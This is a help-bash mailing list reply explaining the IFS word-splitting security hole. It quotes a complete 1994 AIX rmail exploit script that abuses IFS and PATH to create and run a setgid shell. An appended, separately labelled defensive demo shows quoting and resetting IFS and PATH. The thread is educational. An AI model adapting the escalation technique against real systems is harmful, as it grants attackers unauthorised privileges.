help-bash

Re: Why is *splitting every word* is a shell security hole?


From: G. Branden Robinson
Subject: Re: Why is *splitting every word* is a shell security hole?
Date: Mon, 19 Aug 2024 09:56:32 -0500

At 2024-08-19T16:50:08+0200, Emanuele Torre wrote:
> On Mon, Aug 19, 2024 at 11:41:38AM +0000, shynur . wrote:
> > Why is *splitting every word* a shell security hole?
> > Can someone give me an example?  Thanks!

If you also control the characters upon which the shell splits words,
interesting things become possible.

> That is probably referring to the fact that Bourne shells split all
> unquoted words including literal words, unlike bash, ksh, and later
> POSIX sh:
> 
>     b# IFS=b; set -x; echo foobar
>     + echo foo ar
>     foo ar
> 
>     b# IFS=b; set -x; echo 'foobar'
>     + echo foobar
>     foobar
> 
> I don't know what security hole it is talking about specifically, but
> you could imagine something like   rmdir foo   running  rm ir foo  if
> IFS is set to 'd'.
> 
>     b# IFS=d; set -x; rmdir foo
>     + rm ir foo
>     ...

An old article illustrates.

https://web.archive.org/web/20160928211311/http://www.securityfocus.com/bid/454/exploit/

#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994

# Setup needed files.

mkdir /tmp/.rmail
cd /tmp/.rmail

# "usr": the file that runs in place of the first component of a /usr/...
# path once IFS=/ has split that path into separate words.  It copies a
# shell and makes it setgid (mode 2777), so the copy keeps rmail's group.
cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .      # "sh" in the cwd, so "cp sh mailsh" copies /bin/sh

# Set PATH, IFS, and run rmail.

setenv PATH .:$PATH  # "." first: the word "usr" resolves to ./usr above
setenv IFS /         # the shell rmail invokes now splits "/usr/..." on "/"
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh

Regards,
Branden

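The mechanism discussed in this thread, as an added example (it is not from the thread or from the 1994 exploit script): in a modern POSIX sh a chosen IFS still rewrites any unquoted expansion, while a literal word is left alone, and the fix is to quote and to reset IFS and PATH before trusting anything. The "victim" command line `rmdir foo`, the rm/rmdir stand-ins on PATH (which only print the argv they were invoked with) and the function names are constructed for the demo; it assumes a POSIX sh with mktemp.

```shell
#!/bin/sh
# Added example, not from the thread or the 1994 exploit: how a chosen IFS
# turns an unquoted expansion into a different command in a modern POSIX sh,
# why a literal word is safe, and what a script should reset before it
# trusts its environment.  The rm/rmdir stand-ins are constructed for the
# demo; they only print the argv they were invoked with.

# Fields produced by expanding $2 unquoted under IFS=$1 (subshell body, so
# the caller's IFS is untouched).
count_fields() ( IFS=$1; set -- $2; echo "$#" )

# The same string as a literal word: post-Bourne shells never split it.
count_literal_fields() ( IFS=b; set -- foobar; echo "$#" )

# Stage a PATH directory with stand-ins for rm and rmdir that echo their name
# and arguments, so we can see what the shell actually executed.
stage_fake_bin() {
    dir=$(mktemp -d) || return 1
    for name in rm rmdir; do
        printf '#!/bin/sh\necho %s "$@"\n' "$name" > "$dir/$name"
        chmod 755 "$dir/$name"
    done
    echo "$dir"
}

# Run the victim's command line "rmdir foo" with attacker-chosen IFS=$1.
# $2 is "quoted" or "unquoted".  Prints the argv that was really executed.
run_victim() {
    fakebin=$(stage_fake_bin) || return 1
    out=$(
        PATH=$fakebin:$PATH
        cmd=rmdir                   # what the script author intended to run
        IFS=$1                      # attacker influence, as in the AIX case
        if [ "$2" = quoted ]; then
            "$cmd" foo              # quoted: no splitting, runs rmdir foo
        else
            $cmd foo                # unquoted: IFS=d yields rm ir foo
        fi
    )
    rm -rf "$fakebin"
    printf '%s\n' "$out"
}

# What a privileged or setgid-invoked script should do before any expansion:
# put IFS back to the POSIX default and stop trusting PATH and startup hooks.
harden_env() {
    IFS=$(printf ' \t\nx'); IFS=${IFS%x}   # space, tab, newline; x keeps the newline
    PATH=/usr/bin:/bin; export PATH
    unset ENV BASH_ENV CDPATH
}

echo "literal foobar, IFS=b:         $(count_literal_fields) field(s)"
echo "\$var=foobar unquoted, IFS=b:  $(count_fields b foobar) field(s)"
echo "\$cmd foo unquoted, IFS=d ran:  $(run_victim d unquoted)"
echo "\"\$cmd\" foo quoted, IFS=d ran: $(run_victim d quoted)"
```

The unquoted run is Emanuele's `rmdir foo` becoming `rm ir foo`, only with `$cmd` standing in for the literal that an old Bourne sh would also have split; the quoted run shows the same attacker IFS doing nothing. The 1994 script needed control of both IFS and PATH, which is why harden_env resets both first.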

